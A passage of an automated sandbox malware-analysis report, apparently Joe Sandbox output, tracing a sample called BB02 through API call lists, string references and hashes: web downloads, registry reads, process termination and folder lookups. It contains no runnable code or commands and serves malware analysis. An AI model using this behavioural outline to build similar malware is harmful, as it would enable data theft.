lstrcpy.KERNEL32(00000000,00000000), ref: 024F8466
strtok_s.MSVCRT ref: 024F8476

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID:
API String ID: 3280532728-0
Opcode ID: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
Instruction ID: c6202f512ba03539fbdea1fc065a94b483c9ee6a780257c97be4f511f57e9b09
Opcode Fuzzy Hash: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
Instruction Fuzzy Hash: 9A416A716002069FDB61DF68D984BAABBF5EF84704F00801EED4ADB255EB74E945CFA0

Function 024E57D7 Relevance: 10.6, APIs: 7, Instructions: 112networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 024E57F0
RtlAllocateHeap.NTDLL(00000000), ref: 024E57F7
InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 024E580D
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 024E5828
InternetReadFile.WININET(?,?,00000400,00000001), ref: 024E5853
InternetCloseHandle.WININET(?), ref: 024E5892
InternetCloseHandle.WININET(00000000), ref: 024E5899

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction ID: 17a7e253d387c003481f1d9889cb7daf4f65314f76ceec49be1c5647566d8cd8
Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction Fuzzy Hash: 2E417F70A00204AFEB24CF55DC48B9AB7B5FF48319F5481AAE51A9B3A0D7B19941CF94

Function 00417DC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00417DD8

Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A

std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
std::_Xinvalid_argument.LIBCPMT ref: 00417E11
memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74

Strings

string too long, xrefs: 00417DF1, 00417E0C
invalid string position, xrefs: 00417DD3

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
String ID: invalid string position$string too long
API String ID: 702443124-4289949731
Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction ID: 79f032b162a4ed5f1b8d8c3a7f5ff0854d2ec62b836a1cb7fb32b648417a52a7
Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction Fuzzy Hash: 5921C3323047008BD7249E2CE980B6AB7F5AF95720F604A6FF4968B381D775DC8187A9

Function 00408880 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004088B3

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

Strings

yxxx, xrefs: 0040890A
x@, xrefs: 00408954
vector<T> too long, xrefs: 004088AE
x@, xrefs: 004088EC, 004088EF
yxxx, xrefs: 004088BD

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long$yxxx$yxxx$x@$x@
API String ID: 2884196479-4254290729
Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction ID: 642d6f8d25606cb57c5c368211f8c71801378994f2d8b98954bdbb6ac3618ebc
Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction Fuzzy Hash: 3F31B7B5E005159BCB08DF58C9906AEBBB6EB88310F14827EE905EB385DB34A901CBD5

Function 02502A87 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02502A9C
RtlAllocateHeap.NTDLL(00000000), ref: 02502AA3

Part of subcall function 02502B17: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02502B2C
Part of subcall function 02502B17: RtlAllocateHeap.NTDLL(00000000), ref: 02502B33
Part of subcall function 02502B17: RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,02502AB0), ref: 02502B52
Part of subcall function 02502B17: RegQueryValueExA.ADVAPI32(02502AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 02502B6C
Part of subcall function 02502B17: RegCloseKey.ADVAPI32(02502AB0), ref: 02502B76

RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,024F97C7), ref: 02502AD8
RegQueryValueExA.ADVAPI32(024F97C7,00638C34,00000000,00000000,00000000,000000FF), ref: 02502AF3
RegCloseKey.ADVAPI32(024F97C7), ref: 02502AFD

Strings

Windows 11, xrefs: 02502AB7

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction ID: c0ac7598c0016fe1ea4913d601cd0638fa97fb719760d18a1dd76e95360fd63a
Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction Fuzzy Hash: C6018B71640309AFE7149BA4AC8DEAA7B6EEB44315F001159BE09D3290DAB099448BE4

Function 024E7C07 Relevance: 10.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

Part of subcall function 024E7977: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 024E79AC
Part of subcall function 024E7977: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 024E79F1
Part of subcall function 024E7977: strlen.MSVCRT ref: 024E7A25
Part of subcall function 024E7977: StrStrA.SHLWAPI(?,0043508C), ref: 024E7A5F
Part of subcall function 024E7977: strcpy_s.MSVCRT ref: 024E7A88
Part of subcall function 024E7977: GetProcessHeap.KERNEL32(00000000,00000000), ref: 024E7A93
Part of subcall function 024E7977: HeapFree.KERNEL32(00000000), ref: 024E7A9A
Part of subcall function 024E7977: strlen.MSVCRT ref: 024E7AA7

lstrcat.KERNEL32(00638E68,0043509C), ref: 024E7C37
lstrcat.KERNEL32(00638E68,?), ref: 024E7C64
lstrcat.KERNEL32(00638E68,004350A0), ref: 024E7C76
lstrcat.KERNEL32(00638E68,?), ref: 024E7C97
wsprintfA.USER32 ref: 024E7CB7
lstrcpy.KERNEL32(00000000,?), ref: 024E7CE0
lstrcat.KERNEL32(00638E68,00000000), ref: 024E7CEE
lstrcat.KERNEL32(00638E68,0043509C), ref: 024E7D07

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
String ID:
API String ID: 2460923012-0
Opcode ID: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
Instruction ID: 86935f94dd0a1414711416a714950ef90dbf0dd46956432f443090587c6333eb
Opcode Fuzzy Hash: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
Instruction Fuzzy Hash: 4931A472900214EFEF14DB64DC44EAFF77ABB88725B14151AE60A93350DB74E941CBA0

Function 024FDB27 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 024FDB53
RegOpenKeyExA.ADVAPI32(80000001,00638CD8,00000000,00020119,?,00000000,000000FE), ref: 024FDB73
RegQueryValueExA.ADVAPI32(?,006388D4,00000000,00000000,?,?), ref: 024FDB9A
RegCloseKey.ADVAPI32(?), ref: 024FDBA5
lstrcat.KERNEL32(?,?), ref: 024FDBCB
lstrcat.KERNEL32(?,00638968), ref: 024FDBDD

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 69500862d738dca9bfa499551e5225b9e751b41ace5b549e9b88ef694551efee
Instruction ID: 21b4bbd39bef2419af11b2a56b66dd78b4b95134c9b3b607f6681743f2b77fe6
Opcode Fuzzy Hash: 69500862d738dca9bfa499551e5225b9e751b41ace5b549e9b88ef694551efee
Instruction Fuzzy Hash: BD414FB1604245AFEB54EF25DC45FDA77EAAF84704F00882DB94D87260DB71E948CF92

Function 02504787 Relevance: 9.1, APIs: 6, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,024F558F), ref: 025047CC
RtlAllocateHeap.NTDLL(00000000), ref: 025047D3
wsprintfW.USER32 ref: 025047E2
OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 02504851
TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 02504860
CloseHandle.KERNEL32(00000000,?,?), ref: 02504867

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
String ID:
API String ID: 885711575-0
Opcode ID: 86b9f473664707f9828ef1b286254fe0fdbf0f8e23cb3414a50381cb6247922d
Instruction ID: 3b3ab9a847197cdc0f5df9beaaabbd13dcd7ad9a3c3da06d6b2acc6c042bf7ba
Opcode Fuzzy Hash: 86b9f473664707f9828ef1b286254fe0fdbf0f8e23cb3414a50381cb6247922d
Instruction Fuzzy Hash: B5316F71A00245BBEB24DFA4DC89FDEB77DBF44741F104459FA05E7180EBB0A6418BA9

Function 00409AE0 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,004012EE), ref: 00409AFA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004012EE), ref: 00409B10
LocalAlloc.KERNEL32(00000040,?,?,?,?,004012EE), ref: 00409B27
ReadFile.KERNEL32(00000000,00000000,?,004012EE,00000000,?,?,?,004012EE), ref: 00409B40
LocalFree.KERNEL32(?,?,?,?,004012EE), ref: 00409B60
CloseHandle.KERNEL32(00000000,?,?,?,004012EE), ref: 00409B67

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
Instruction ID: d5e2846254d17b4b79341e9ac440d2f7db04c9e9ad0a28dbd651dd387858d46a
Opcode Fuzzy Hash: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
Instruction Fuzzy Hash: 06114C71A00209AFE7109FA5ED84ABB737DFB04750F10016AB904A72C1EB78BD408BA8

Function 004089B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004089C6

Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A

std::_Xinvalid_argument.LIBCPMT ref: 004089FD

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

memcpy.MSVCRT(?,00000000,?,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408A5B

Strings

string too long, xrefs: 004089F8
invalid string position, xrefs: 004089C1

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
String ID: invalid string position$string too long
API String ID: 2202983795-4289949731
Opcode ID: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
Instruction ID: 649aac53c67e3ee9f5cf0101b70db7c319c758bc323567c03d989288a4630d66
Opcode Fuzzy Hash: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
Instruction Fuzzy Hash: 0721F6723006108BC720AA5CEA40A6BF7A9DBA1760B20093FF181DB7C1DA79D841C7ED

Function 00408B50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(004078EE,004088DD,03C3C3C3,00000401,004078EE,?,00000000,?,004078EE,80000001), ref: 00408B70
std::exception::exception.LIBCMT ref: 00408B8B
__CxxThrowException@8.LIBCMT ref: 00408BA0

Strings

Pv@, xrefs: 00408B99
x@, xrefs: 00408B7D, 00408B80

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: Pv@$x@
API String ID: 3448701045-2507878009
Opcode ID: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction ID: d532d441e19495b57cb34d138c3e0c88a0b377879b543fee6e4065129139ec29
Opcode Fuzzy Hash: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction Fuzzy Hash: 37F027B160020997EB18E7E08D027BF7374AF00304F04847EA911E2340FB7CD605819A

Function 00408D80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00408C9B,00000000,?,?,00000000), ref: 00408D92
std::exception::exception.LIBCMT ref: 00408DAD
__CxxThrowException@8.LIBCMT ref: 00408DC2

Strings

Pv@, xrefs: 00408DBB
PC, xrefs: 00408DA3, 00408DB7, 00408DBA

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: Pv@$PC
API String ID: 3448701045-1362088297
Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction ID: c1c2e9470fcfd07362e0a09b01d9ac21ad58a2ed8b2a4eb6edd2c0a09cf1513b
Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction Fuzzy Hash: 9AE02B7050030A97CB18F7B59D016BF73789F10304F40476FE965A22C1EF798504859D

Function 024E8FE7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,024E8F02,00000000,?,?,00000000), ref: 024E8FF9
std::exception::exception.LIBCMT ref: 024E9014
__CxxThrowException@8.LIBCMT ref: 024E9029

Strings

PC, xrefs: 024E900A, 024E901E, 024E9021
PC, xrefs: 024E9022

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: PC$PC
API String ID: 3448701045-3524912142
Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction ID: 760e0b849cee39372be98f4995d6330bcded08b4848bac8b5ec019c280ad5721
Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction Fuzzy Hash: 09E02B7480030A56EF28EBB48C516BF7378EF04305F40075AD927522C0EB7091048A99

Function 024F7E76 Relevance: 7.9, APIs: 5, Instructions: 367stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00638AAC), ref: 024F79D7
StrCmpCA.SHLWAPI(?,00638C1C), ref: 024F7AAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F7AE7
lstrcpy.KERNEL32(00000000,?), ref: 024F7B44

Part of subcall function 025074A7: lstrcpy.KERNEL32(00000000), ref: 025074C1

Part of subcall function 024E1677: lstrcpy.KERNEL32(00000000,?), ref: 024E169E
Part of subcall function 024E1677: lstrcpy.KERNEL32(00000000,?), ref: 024E16C0
Part of subcall function 024E1677: lstrcpy.KERNEL32(00000000,?), ref: 024E16E2
Part of subcall function 024E1677: lstrcpy.KERNEL32(00000000,?), ref: 024E1746

Part of subcall function 024F5E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F5E7C
Part of subcall function 024F5E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 024F5EAB
Part of subcall function 024F5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 024F5EDC
